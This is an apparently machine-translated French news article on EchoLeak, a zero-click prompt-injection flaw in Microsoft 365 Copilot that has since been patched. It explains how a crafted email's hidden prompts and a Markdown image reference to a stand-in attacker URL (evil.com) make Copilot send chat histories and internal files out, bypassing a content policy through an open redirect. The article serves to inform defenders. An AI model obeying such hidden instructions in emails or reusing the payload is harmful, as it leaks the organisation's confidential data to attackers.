Tout premier ciblage d’attaque en clic zéro Microsoft 365 Copilot

Lucas Morel

Un seul e-mail peut déclencher silencieusement Copilot pour exfiltrer les données d’entreprise sensibles – pas de clics, pas d’avertissements, pas d’action utilisateur.

Imaginez une attaque si furtive qu’elle ne nécessite pas de clics, pas de téléchargements, pas d’avertissement – juste un e-mail assis dans votre boîte de réception. Il s’agit d’Echoleak, une vulnérabilité critique dans le copilote Microsoft 365 qui permet aux pirates de voler des données d’entreprise sensibles sans une seule action de la victime.

Découvert par AIM Security, il s’agit de la première attaque en clic zéro documenté contre un agent d’IA, exposant les risques invisibles qui se cachent dans les outils d’IA que nous utilisons chaque jour.

Un e-mail conçu est tout ce qu’il faut. Copilot le traite silencieusement, suit des invites cachées, fouille à travers des fichiers internes et envoie des données confidentielles, tout en glissant devant les défenses de sécurité de Microsoft, selon le billet de blog de la société.

« C’est une pure armement de la force fondamentale de l’IA, une compréhension contextuelle, contre elle-même », a déclaré Abhishek Anant Garg, analyste au QKS Group. « Les luttes de sécurité de l’entreprise parce qu’elle est construite pour un code malveillant, pas un langage qui a l’air inoffensif mais qui agit comme une arme. »

Ce type de vulnérabilité représente une menace significative, a averti Nader Henein, analyste VP chez Gartner. « Compte tenu de la complexité des assistants de l’IA et des services basés sur les chiffons, ce n’est certainement pas le dernier que nous verrons. »

Mécanisme d’exploitation d’Echoleak

Echoleak exploite la capacité de Copilot à gérer à la fois les données internes de confiance (comme les e-mails, les chats d’équipes et les fichiers OneDrive) et les entrées externes non fiables, telles que les e-mails entrants. L’attaque commence par un e-mail malveillant contenant une syntaxe spécifique de Markdown, «Like! (Image Alt Text) (Réf) (Réf): https://www.evil.com?param= .» Lorsque Copilot scanne automatiquement l’e-mail en arrière-plan pour préparer les requêtes utilisateur, il déclenche une demande de navigateur qui envoie des données sensibles, telles que des histoires de chat, des détails de l’utilisateur ou des documents internes, au serveur d’un attaquant.

La chaîne d’exploitation repose sur trois vulnérabilités, y compris une redirection ouverte dans la politique de sécurité du contenu de Microsoft (CSP), qui fait confiance aux domaines comme les équipes et SharePoint. Cela permet aux attaquants de masquer les demandes malveillantes comme légitimes, en contournant les défenses de Microsoft contre les attaques d’injection entre les compressions croisées (XPIA).

« Echoleak expose la fausse sécurité des déploiements en phase d’IA », a noté Garg. AIM Security classe ce défaut comme une «violation de la portée LLM», où les invites non fiables manipulent l’IA dans l’accès aux données en dehors de sa portée prévue. « Les attaquants peuvent faire référence au contenu d’autres parties du contexte LLM pour extraire des informations sensibles, transformant la capacité de l’IA à synthétiser en un vecteur d’exfiltration de données », a déclaré Garg.

Les chercheurs ont également trouvé d’autres faiblesses similaires, laissant entendre que d’autres systèmes d’IA utilisant la même technologie pourraient être à risque. Microsoft a déclaré que cela avait corrigé la vulnérabilité, confirmant qu’aucun client n’était affecté et qu’aucune attaque réelle ne s’était produite.

Écho au-delà de Microsoft

« Echoleak marque un passage aux architectures de l’hypothèse de compromis », a déclaré Garg. «Les entreprises doivent désormais supposer que l’injection rapide contradictoire se produira, ce qui rend la surveillance comportementale en temps réel et la modélisation des menaces spécifiques aux agents exigences existentielles.»

Alors que l’IA devient un aliment de base en milieu de travail, les analystes exhortent une validation d’entrée robuste et l’isolement des données. Henein a averti que des attaques ciblées telles que «l’envoi d’un e-mail à un CFO pour voler des données sur les bénéfices avant la divulgation» sont particulièrement préoccupantes.

Tout système d’IA construit sur la génération (RAG) de la récupération pourrait être à risque s’il traite les entrées externes aux côtés de données internes sensibles. Les défenses traditionnelles comme les balises DLP ne parviennent souvent pas à empêcher de telles attaques et peuvent nuire aux fonctionnalités de Copilot lorsqu’elles sont activées, Garg a expliqué: «La vulnérabilité prouve que les périmètres traditionnels n’ont pas de sens lorsque l’IA peut être manipulée pour violer les frontières grâce à des entrées apparemment innocentes.»

À mesure que la surface d’attaque de l’IA se développe, Echoleak prouve que même les systèmes les plus sophistiqués peuvent être armées en exploitant la propre logique de l’IA. « Pour l’instant », a conclu Garg, « les CISO devraient faire confiance, mais vérifier et réfléchir à deux fois avant de laisser l’IA lire votre boîte de réception. »

Plus de nouvelles de la sécurité Microsoft:

  • Microsoft lance un programme de sécurité européen pour contrer les menaces d’État-nation
  • Microsoft fait le premier pas vers l’avenir sans mot de passe
  • Microsoft pousse beaucoup de produits sur les utilisateurs, mais voici une cybersécurité peut embrasser